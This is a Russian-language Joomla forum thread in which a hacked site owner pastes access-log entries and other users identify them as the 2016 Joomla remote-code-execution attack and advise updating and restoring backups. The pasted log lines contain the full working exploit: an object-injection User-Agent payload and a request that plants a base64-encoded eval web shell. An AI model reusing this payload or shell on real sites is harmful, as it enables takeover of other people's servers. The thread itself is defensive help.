0 Пользователей и 1 Гость просматривают эту тему.
  • 23 Ответов
  • 992 Просмотров
*

Mc13

  • Захожу иногда
  • 11
  • 0
Взломали сайт
« : 22.02.2016, 22:20:05 »
Всем привет! Недавно взломали мой сайт, сначала шел спам, потом сайт умер. В корневой папке было много всякой вкусности. Вроде все починил но стал параноиком) Сегодня нашел две странные строки в лог файле, пугает что на такой запрос сервер дал ответ 200. Не взлом ли это ?


173.255.143.235 - - [22/Feb/2016:20:07:55 +0300] "GET /index.php?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28dirname%28%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%29.%27/administrator.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 53001 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
173.255.143.235 - - [22/Feb/2016:20:07:56 +0300] "GET /index.php?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28dirname%28%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%29.%27/administrator.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 53001 "-" "Python-urllib/2.7"
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Взломали сайт
« Ответ #1 : 22.02.2016, 22:24:37 »
Взлом конечно, покажите домен, тоже зальюсь))) и вообще какой это чайник так в логах палится?
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #2 : 22.02.2016, 22:27:08 »
То есть это удачная попытка взлома?
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Взломали сайт
« Ответ #3 : 22.02.2016, 22:32:56 »
То есть это удачная попытка взлома?
Это реализация последней нашумевшей баги RCE под Joomla

Т.е произвольное выполнение кода! могу делать что хочу с сайтом!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #4 : 22.02.2016, 22:34:56 »
Что делать? сносить сайт и заливать последний бэкап? ждать обновления?
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Взломали сайт
« Ответ #5 : 22.02.2016, 22:36:26 »
Обновления уже выпущены, займитесь безопасностью сайта
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

dmitry_stas

  • Профи
  • 10059
  • 955
Re: Взломали сайт
« Ответ #6 : 22.02.2016, 22:38:40 »
ждать обновления?
какая текущая версия Joomla?
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #7 : 22.02.2016, 22:41:20 »
Админку уже скрыл. 3.4.3. вроде как мене в аминке пишет что актуальная версия. и от инекций я тоже плагин ставил( может мне движек поменять? что то с это Joomla все плохо.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Взломали сайт
« Ответ #8 : 22.02.2016, 22:43:27 »
С джумло все норм, если следить за актуальностью, как и с любым другим продуктом, баги всегда были есть и будут, не зависимо от версии...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

dmitry_stas

  • Профи
  • 10059
  • 955
Re: Взломали сайт
« Ответ #9 : 22.02.2016, 22:45:44 »
что то с это Joomla все плохо.
это не с Joomla плохо. последняя версия - 3.4.8
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #10 : 22.02.2016, 22:48:41 »
среди мои знакомых ни кого не ломают, ни на Wordpress, ни на опенкарт. а меня уже второй раз за неделю, кажется это не есть гуд
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #11 : 22.02.2016, 22:49:08 »
странно а почему она мне обновится не предлагает?
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Взломали сайт
« Ответ #12 : 22.02.2016, 22:50:58 »
среди мои знакомых ни кого не ломают, ни на Wordpress, ни на опенкарт. а меня уже второй раз за неделю, кажется это не есть гуд
Поверте и WP, и опен карт ломают, в первую очиредь уязвимость, это человеческий фактор халатности и не внимательности, почитайте багтреки....
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #13 : 22.02.2016, 23:02:36 »
Сделал вручную. Но сносить все равно надо? Как вы думаете сайт уже заражен?
*

dmitry_stas

  • Профи
  • 10059
  • 955
Re: Взломали сайт
« Ответ #14 : 23.02.2016, 00:32:55 »
ломают все, какая разница что ломать? :) банки ломают, а вы говорите opencart... Joomla далеко не самый худший вариант в плане безопасности.
сайт уже заражен.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #15 : 23.02.2016, 00:41:33 »
Спасибо за инфу, так бы седел гадал) заливаю последний проверенный бэк ап и ещё раз обновлю в ручном режиме движек. а не подскажите как через htaccess заблокировать доступ всех стран кроме СНГ? Круто что я этот лог заметил. Прям горжусь собой. Правда жалко тратить по 20 минут каждый день на просмотр логов
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Взломали сайт
« Ответ #16 : 23.02.2016, 00:48:28 »
Спасибо за инфу, так бы седел гадал) заливаю последний проверенный бэк ап и ещё раз обновлю в ручном режиме движек. а не подскажите как через htaccess заблокировать доступ всех стран кроме СНГ? Круто что я этот лог заметил. Прям горжусь собой. Правда жалко тратить по 20 минут каждый день на просмотр логов
Задать этот вопрос поисковику не судьба? Вот ответ.

В вашем случае следует регулярно следить за обновлениями и поддерживать движок в актуальном состоянии и не пичкать его левыми расширениями. Так будет меньше шансов его взломать.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #17 : 23.02.2016, 00:58:29 »
Спасибо. Тут больше инфы чем я накопал. Взламывают то боты. А расширения у меня все с оф сайтов, что попало не ставлю. Обидно просто что это так быстро все случилось на ровном месте, долбанные боты, главное IP то амерекосовское.
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Взломали сайт
« Ответ #18 : 23.02.2016, 01:04:29 »
долбанные боты, главное IP то амерекосовское.
Не факт. Есть такая полезная вещь, как прокси... А еще - уже взломанные сайты. Так что установка блокирования забугорных IP лишь немного затруднит работу программы. Но не заблокирует. dmitry_stas и winstrool вам выше все детально разжевали.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #19 : 23.02.2016, 01:12:24 »
Буду думать о защите и чаще обновлятся. думал папки переименовать но это тоже влечет неприятные моменты. меня эти взломы сделали параноиком))) незнаю что ещё придумать. админку скрыл, JHackGuard поставил, админинтулс бесплатный. В общем буду думать. затем не буду вам парить мозги. спасибо за помощь!)))
*

SeBun

  • Практически профи
  • 3163
  • 193
  • @SeBun48
Re: Взломали сайт
« Ответ #20 : 23.02.2016, 09:32:27 »
меня эти взломы сделали параноиком))) незнаю что ещё придумать.
Для того, что бы понять, как защитить сайт, надо знать хотя бы основные техники взлома. Как вы собираетесь ездить на танке, не зная, как им управлять? Я не говорю уже о том, что нужно крутить башню, наводить орудие, производить выстрелы и, главное, что бы тебя не подбили, иметь хоть малейшее представление о тактике боя?

Ссылка первая - сканер. Не панацея, но облегчает жизнь.
Ссылка вторая - море информации для новичка - основы, которые нужно знать!
Ссылка третья - практика взлома Joomla, начиная с первых версий.

Вот после ознакомления со всеми материалами можно будет сказать, что вы имеете представление о том, как ломают сайты, и сможете мыслить в правильном направлении. Это как получение теоретических знаний по вождению. А пока, по аналогии с танком, вы сидите, дергаете все рычаги и тыкаете на кнопки, а он, зараза, не заводится.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

Mc13

  • Захожу иногда
  • 11
  • 0
Re: Взломали сайт
« Ответ #21 : 23.02.2016, 10:30:33 »
Спасибо за совет. сканером этим я активно пользуюсь, очень много ложных сигналов. со всем остальным ознакомлюсь.
*

dmitry_stas

  • Профи
  • 10059
  • 955
Re: Взломали сайт
« Ответ #22 : 23.02.2016, 10:36:15 »
в данном случае лучше много ложных, чем один реальный :)
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

flyingspook

  • Moderator
  • 3620
  • 236
Re: Взломали сайт
« Ответ #23 : 23.02.2016, 19:17:16 »
Почитайте Раздел безопасности форума в нем много информации полезной есть
Тема раз
Тема два
Тема три
и др. темы несут в себе море информации.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Обновился phpmailer. Сам? Взломали?

Автор master-smeta

Ответов: 58
Просмотров: 2374
Последний ответ 06.09.2017, 14:49:53
от flyingspook
Взломали?

Автор borro

Ответов: 28
Просмотров: 257
Последний ответ 30.08.2017, 12:59:19
от Missile
На протяжении месяца постоянно взламывают сайт

Автор kaaaaaljan

Ответов: 4
Просмотров: 374
Последний ответ 17.07.2017, 21:36:10
от Sulpher
Помогите вылечить сайт от вирусов

Автор Victor333

Ответов: 26
Просмотров: 534
Последний ответ 15.06.2017, 18:35:15
от Миха1211
Атака на сайт?

Автор yura88851

Ответов: 7
Просмотров: 746
Последний ответ 30.03.2017, 22:40:00
от yura88851